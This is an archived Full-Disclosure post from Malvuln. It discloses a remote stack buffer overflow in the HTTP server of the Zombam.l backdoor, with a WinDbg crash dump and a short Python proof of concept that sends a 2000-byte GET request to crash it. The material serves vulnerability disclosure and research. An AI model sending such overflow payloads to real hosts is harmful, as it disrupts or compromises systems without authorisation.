lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 14 Mar 2021 21:44:56 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Zombam.l / Remote Stack Buffer Overflow

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/56d356c5b1ae3a91caac511179159034.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Zombam.l
Vulnerability: Remote Stack Buffer Overflow
Description: Zombam.l creates files to serve as backdoors the default name
is "httpserver.exe" and listens on TCP port 80. Attackers who can reach the
backdoor can send HTTP GET request of about 2000 bytes to trigger buffer
overflow corrupting the stack and overwriting EDX register.
Type: PE32
MD5: 56d356c5b1ae3a91caac511179159034
Vuln ID: MVID-2021-0129
Dropped files: httpserver.exe
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 03/14/2021

Memory Dump:
(d00.168): Access violation - code c0000005 (first/second chance not
available)
eax=00000000 ebx=00000000 ecx=027cfa20 edx=41414141 esi=00000003
edi=00000003
eip=7710ed3c esp=027cf0bc ebp=027cf24c iopl=0         nv up ei pl nz na po
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400          ret     14h

0:005> .ecxr
eax=027cf9f0 ebx=04190310 ecx=027cfa20 edx=41414141 esi=04190310
edi=004057e6
eip=004029e0 esp=027cf9d8 ebp=027cfa28 iopl=0         nv up ei pl zr na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010246
*** WARNING: Unable to verify checksum for httpserver.exe
*** ERROR: Module load completed but symbols could not be loaded for
httpserver.exe
httpserver+0x29e0:
004029e0 8b4204          mov     eax,dword ptr [edx+4]
ds:002b:41414145=????????

0:005> !analyze -v
*******************************************************************************
*
  *
*                        Exception Analysis
  *
*
  *
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
httpserver+29e0
004029e0 8b4204          mov     eax,dword ptr [edx+4]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 004029e0 (httpserver+0x000029e0)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 41414145
Attempt to read from address 41414145

PROCESS_NAME:  httpserver.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  41414145

READ_ADDRESS:  41414145

FOLLOWUP_IP:
httpserver+29e0
004029e0 8b4204          mov     eax,dword ptr [edx+4]

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  00000168

BUGCHECK_STR:
 APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STRING_DEREFERENCE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STRING_DEREFERENCE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 00402574 to 004029e0

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
027cfa28 00402574 41414141 027cfa40 00000415 httpserver+0x29e0
027cfaa4 41414141 41414141 41414141 41414141 httpserver+0x2574
027cfaa8 41414141 41414141 41414141 41414141 0x41414141
027cfaac 41414141 41414141 41414141 41414141 0x41414141
027cfab0 41414141 41414141 41414141 41414141 0x41414141
027cfab4 41414141 41414141 41414141 41414141 0x41414141
027cfab8 41414141 41414141 41414141 41414141 0x41414141
027cfabc 41414141 41414141 41414141 41414141 0x41414141
027cfac0 41414141 41414141 41414141 41414141 0x41414141
027cfac4 41414141 41414141 41414141 41414141 0x41414141
027cfac8 41414141 41414141 41414141 41414141 0x41414141
027cfacc 41414141 41414141 41414141 41414141 0x41414141
027cfad0 41414141 41414141 41414141 41414141 0x41414141
027cfad4 41414141 41414141 41414141 41414141 0x41414141
027cfad8 41414141 41414141 41414141 41414141 0x41414141
027cfadc 41414141 41414141 41414141 41414141 0x41414141
027cfae0 41414141 41414141 41414141 41414141 0x41414141
027cfae4 41414141 41414141 41414141 41414141 0x41414141
027cfae8 41414141 41414141 41414141 41414141 0x41414141
027cfaec 41414141 41414141 41414141 41414141 0x41414141
027cfaf0 41414141 41414141 41414141 41414141 0x41414141
027cfaf4 41414141 41414141 41414141 41414141 0x41414141
027cfaf8 41414141 41414141 41414141 41414141 0x41414141
027cfafc 41414141 41414141 41414141 41414141 0x41414141
027cfb00 41414141 41414141 41414141 41414141 0x41414141
027cfb04 41414141 41414141 41414141 41414141 0x41414141
027cfb08 41414141 41414141 41414141 41414141 0x41414141
027cfb0c 41414141 41414141 41414141 41414141 0x41414141
027cfb10 41414141 41414141 41414141 41414141 0x41414141
027cfb14 41414141 41414141 41414141 41414141 0x41414141
027cfb18 41414141 41414141 41414141 41414141 0x41414141
027cfb1c 41414141 41414141 41414141 41414141 0x41414141
027cfb20 41414141 41414141 41414141 41414141 0x41414141
027cfb24 41414141 41414141 41414141 41414141 0x41414141
027cfb28 41414141 41414141 41414141 41414141 0x41414141
027cfb2c 41414141 41414141 41414141 41414141 0x41414141
027cfb30 41414141 41414141 41414141 41414141 0x41414141
027cfb34 41414141 41414141 41414141 41414141 0x41414141
027cfb38 41414141 41414141 41414141 41414141 0x41414141
027cfb3c 41414141 41414141 41414141 41414141 0x41414141
027cfb40 41414141 41414141 41414141 41414141 0x41414141
027cfb44 41414141 41414141 41414141 41414141 0x41414141
027cfb48 41414141 41414141 41414141 41414141 0x41414141
027cfb4c 41414141 41414141 41414141 41414141 0x41414141
027cfb50 41414141 41414141 41414141 41414141 0x41414141
027cfb54 41414141 41414141 41414141 41414141 0x41414141
027cfb58 41414141 41414141 41414141 41414141 0x41414141
027cfb5c 41414141 41414141 41414141 41414141 0x41414141
027cfb60 41414141 41414141 41414141 41414141 0x41414141
027cfb64 41414141 41414141 41414141 41414141 0x41414141
027cfb68 41414141 41414141 41414141 41414141 0x41414141
027cfb6c 41414141 41414141 41414141 41414141 0x41414141
027cfb70 41414141 41414141 41414141 41414141 0x41414141
027cfb74 41414141 41414141 41414141 41414141 0x41414141
027cfb78 41414141 41414141 41414141 41414141 0x41414141
027cfb7c 41414141 41414141 41414141 41414141 0x41414141
027cfb80 41414141 41414141 41414141 41414141 0x41414141
027cfb84 41414141 41414141 41414141 41414141 0x41414141
027cfb88 41414141 41414141 41414141 41414141 0x41414141
027cfb8c 41414141 41414141 41414141 41414141 0x41414141
027cfb90 41414141 41414141 41414141 41414141 0x41414141
027cfb94 41414141 41414141 41414141 41414141 0x41414141
027cfb98 41414141 41414141 41414141 41414141 0x41414141
027cfb9c 41414141 41414141 41414141 41414141 0x41414141
027cfba0 41414141 41414141 41414141 41414141 0x41414141
027cfba4 41414141 41414141 41414141 41414141 0x41414141
027cfba8 41414141 41414141 41414141 41414141 0x41414141
027cfbac 41414141 41414141 41414141 41414141 0x41414141
027cfbb0 41414141 41414141 41414141 41414141 0x41414141
027cfbb4 41414141 41414141 41414141 41414141 0x41414141
027cfbb8 41414141 41414141 41414141 41414141 0x41414141
027cfbbc 41414141 41414141 41414141 41414141 0x41414141
027cfbc0 41414141 41414141 41414141 41414141 0x41414141
027cfbc4 41414141 41414141 41414141 41414141 0x41414141
027cfbc8 41414141 41414141 41414141 41414141 0x41414141
027cfbcc 41414141 41414141 41414141 41414141 0x41414141
027cfbd0 41414141 41414141 41414141 41414141 0x41414141
027cfbd4 41414141 41414141 41414141 41414141 0x41414141
027cfbd8 41414141 41414141 41414141 41414141 0x41414141
027cfbdc 41414141 41414141 41414141 41414141 0x41414141
027cfbe0 41414141 41414141 41414141 41414141 0x41414141
027cfbe4 41414141 41414141 41414141 41414141 0x41414141
027cfbe8 41414141 41414141 41414141 41414141 0x41414141
027cfbec 41414141 41414141 41414141 41414141 0x41414141
027cfbf0 41414141 41414141 41414141 41414141 0x41414141
027cfbf4 41414141 41414141 41414141 41414141 0x41414141
027cfbf8 41414141 41414141 41414141 41414141 0x41414141
027cfbfc 41414141 41414141 41414141 41414141 0x41414141
027cfc00 41414141 41414141 41414141 41414141 0x41414141
027cfc04 41414141 41414141 41414141 41414141 0x41414141
027cfc08 41414141 41414141 41414141 41414141 0x41414141
027cfc0c 41414141 41414141 41414141 41414141 0x41414141
027cfc10 41414141 41414141 41414141 41414141 0x41414141
027cfc14 41414141 41414141 41414141 41414141 0x41414141
027cfc18 41414141 41414141 41414141 41414141 0x41414141
027cfc1c 41414141 41414141 41414141 41414141 0x41414141
027cfc20 41414141 41414141 41414141 41414141 0x41414141
027cfc24 41414141 41414141 41414141 41414141 0x41414141
027cfc28 41414141 41414141 41414141 41414141 0x41414141
027cfc2c 41414141 41414141 41414141 41414141 0x41414141
027cfc30 41414141 41414141 41414141 41414141 0x41414141
027cfc34 41414141 41414141 41414141 41414141 0x41414141
027cfc38 41414141 41414141 41414141 41414141 0x41414141
027cfc3c 41414141 41414141 41414141 41414141 0x41414141
027cfc40 41414141 41414141 41414141 41414141 0x41414141
027cfc44 41414141 41414141 41414141 41414141 0x41414141
027cfc48 41414141 41414141 41414141 41414141 0x41414141
027cfc4c 41414141 41414141 41414141 41414141 0x41414141
027cfc50 41414141 41414141 41414141 41414141 0x41414141
027cfc54 41414141 41414141 41414141 41414141 0x41414141
027cfc58 41414141 41414141 41414141 41414141 0x41414141
027cfc5c 41414141 41414141 41414141 41414141 0x41414141
027cfc60 41414141 41414141 41414141 41414141 0x41414141
027cfc64 41414141 41414141 41414141 41414141 0x41414141
027cfc68 41414141 41414141 41414141 41414141 0x41414141
027cfc6c 41414141 41414141 41414141 41414141 0x41414141
027cfc70 41414141 41414141 41414141 41414141 0x41414141
027cfc74 41414141 41414141 41414141 41414141 0x41414141
027cfc78 41414141 41414141 41414141 41414141 0x41414141
027cfc7c 41414141 41414141 41414141 41414141 0x41414141
027cfc80 41414141 41414141 41414141 41414141 0x41414141
027cfc84 41414141 41414141 41414141 41414141 0x41414141
027cfc88 41414141 41414141 41414141 41414141 0x41414141
027cfc8c 41414141 41414141 41414141 41414141 0x41414141
027cfc90 41414141 41414141 41414141 41414141 0x41414141
027cfc94 41414141 41414141 41414141 41414141 0x41414141
027cfc98 41414141 41414141 41414141 41414141 0x41414141
027cfc9c 41414141 41414141 41414141 41414141 0x41414141
027cfca0 41414141 41414141 41414141 41414141 0x41414141
027cfca4 41414141 41414141 41414141 41414141 0x41414141
027cfca8 41414141 41414141 41414141 41414141 0x41414141
027cfcac 41414141 41414141 41414141 41414141 0x41414141
027cfcb0 41414141 41414141 41414141 41414141 0x41414141
027cfcb4 41414141 41414141 41414141 41414141 0x41414141
027cfcb8 41414141 41414141 41414141 41414141 0x41414141
027cfcbc 41414141 41414141 41414141 41414141 0x41414141
027cfcc0 41414141 41414141 41414141 41414141 0x41414141
027cfcc4 41414141 41414141 41414141 41414141 0x41414141
027cfcc8 41414141 41414141 41414141 41414141 0x41414141
027cfccc 41414141 41414141 41414141 41414141 0x41414141
027cfcd0 41414141 41414141 41414141 41414141 0x41414141
027cfcd4 41414141 41414141 41414141 41414141 0x41414141
027cfcd8 41414141 41414141 41414141 41414141 0x41414141
027cfcdc 41414141 41414141 41414141 41414141 0x41414141
027cfce0 41414141 41414141 41414141 41414141 0x41414141
027cfce4 41414141 41414141 41414141 41414141 0x41414141
027cfce8 41414141 41414141 41414141 41414141 0x41414141
027cfcec 41414141 41414141 41414141 41414141 0x41414141
027cfcf0 41414141 41414141 41414141 41414141 0x41414141
027cfcf4 41414141 41414141 41414141 41414141 0x41414141
027cfcf8 41414141 41414141 41414141 41414141 0x41414141
027cfcfc 41414141 41414141 41414141 41414141 0x41414141
027cfd00 41414141 41414141 41414141 41414141 0x41414141
027cfd04 41414141 41414141 41414141 41414141 0x41414141
027cfd08 41414141 41414141 41414141 41414141 0x41414141
027cfd0c 41414141 41414141 41414141 41414141 0x41414141
027cfd10 41414141 41414141 41414141 41414141 0x41414141
027cfd14 41414141 41414141 41414141 41414141 0x41414141
027cfd18 41414141 41414141 41414141 41414141 0x41414141
027cfd1c 41414141 41414141 41414141 41414141 0x41414141
027cfd20 41414141 41414141 41414141 41414141 0x41414141
027cfd24 41414141 41414141 41414141 41414141 0x41414141
027cfd28 41414141 41414141 41414141 41414141 0x41414141
027cfd2c 41414141 41414141 41414141 41414141 0x41414141
027cfd30 41414141 41414141 41414141 41414141 0x41414141
027cfd34 41414141 41414141 41414141 41414141 0x41414141
027cfd38 41414141 41414141 41414141 41414141 0x41414141
027cfd3c 41414141 41414141 41414141 41414141 0x41414141
027cfd40 41414141 41414141 41414141 41414141 0x41414141
027cfd44 41414141 41414141 41414141 41414141 0x41414141
027cfd48 41414141 41414141 41414141 41414141 0x41414141
027cfd4c 41414141 41414141 41414141 41414141 0x41414141
027cfd50 41414141 41414141 41414141 41414141 0x41414141
027cfd54 41414141 41414141 41414141 41414141 0x41414141
027cfd58 41414141 41414141 41414141 41414141 0x41414141
027cfd5c 41414141 41414141 41414141 41414141 0x41414141
027cfd60 41414141 41414141 41414141 41414141 0x41414141
027cfd64 41414141 41414141 41414141 41414141 0x41414141
027cfd68 41414141 41414141 41414141 41414141 0x41414141
027cfd6c 41414141 41414141 41414141 41414141 0x41414141
027cfd70 41414141 41414141 41414141 41414141 0x41414141
027cfd74 41414141 41414141 41414141 41414141 0x41414141
027cfd78 41414141 41414141 41414141 41414141 0x41414141
027cfd7c 41414141 41414141 41414141 41414141 0x41414141
027cfd80 41414141 41414141 41414141 41414141 0x41414141
027cfd84 41414141 41414141 41414141 41414141 0x41414141
027cfd88 41414141 41414141 41414141 41414141 0x41414141
027cfd8c 41414141 41414141 41414141 41414141 0x41414141
027cfd90 41414141 41414141 41414141 41414141 0x41414141
027cfd94 41414141 41414141 41414141 41414141 0x41414141
027cfd98 41414141 41414141 41414141 41414141 0x41414141
027cfd9c 41414141 41414141 41414141 41414141 0x41414141
027cfda0 41414141 41414141 41414141 41414141 0x41414141
027cfda4 41414141 41414141 41414141 41414141 0x41414141
027cfda8 41414141 41414141 41414141 41414141 0x41414141
027cfdac 41414141 41414141 41414141 41414141 0x41414141
027cfdb0 41414141 41414141 41414141 41414141 0x41414141
027cfdb4 41414141 41414141 41414141 41414141 0x41414141
027cfdb8 41414141 41414141 41414141 41414141 0x41414141
027cfdbc 41414141 41414141 41414141 41414141 0x41414141
027cfdc0 41414141 41414141 41414141 41414141 0x41414141
027cfdc4 41414141 41414141 41414141 41414141 0x41414141
027cfdc8 41414141 41414141 41414141 41414141 0x41414141
027cfdcc 41414141 41414141 41414141 41414141 0x41414141
027cfdd0 41414141 41414141 41414141 41414141 0x41414141
027cfdd4 41414141 41414141 41414141 41414141 0x41414141
027cfdd8 41414141 41414141 41414141 41414141 0x41414141
027cfddc 41414141 41414141 41414141 41414141 0x41414141
027cfde0 41414141 41414141 41414141 41414141 0x41414141
027cfde4 41414141 41414141 41414141 41414141 0x41414141
027cfde8 41414141 41414141 41414141 41414141 0x41414141
027cfdec 41414141 41414141 41414141 41414141 0x41414141
027cfdf0 41414141 41414141 41414141 41414141 0x41414141
027cfdf4 41414141 41414141 41414141 41414141 0x41414141
027cfdf8 41414141 41414141 41414141 41414141 0x41414141
027cfdfc 41414141 41414141 41414141 41414141 0x41414141
027cfe00 41414141 41414141 41414141 41414141 0x41414141
027cfe04 41414141 41414141 41414

STACK_COMMAND:  ~5s; .ecxr ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  httpserver+29e0

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: httpserver

IMAGE_NAME:  httpserver.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  3f0668f2

FAILURE_BUCKET_ID:
 STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_httpserver.exe!Unknown

BUCKET_ID:
 APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_httpserver+29e0


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=80

def doit():

    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    JUNK="A"*2000
    PAYLOAD="GET /"+JUNK+" HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n"

    s.send(PAYLOAD)
    s.close()

    print("Backdoor.Win32.Zombam.l / Remote Stack Buffer Overflow")
    print("MD5: 56d356c5b1ae3a91caac511179159034")
    print("BY Malvuln")


if __name__=="__main__":
    doit()



Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists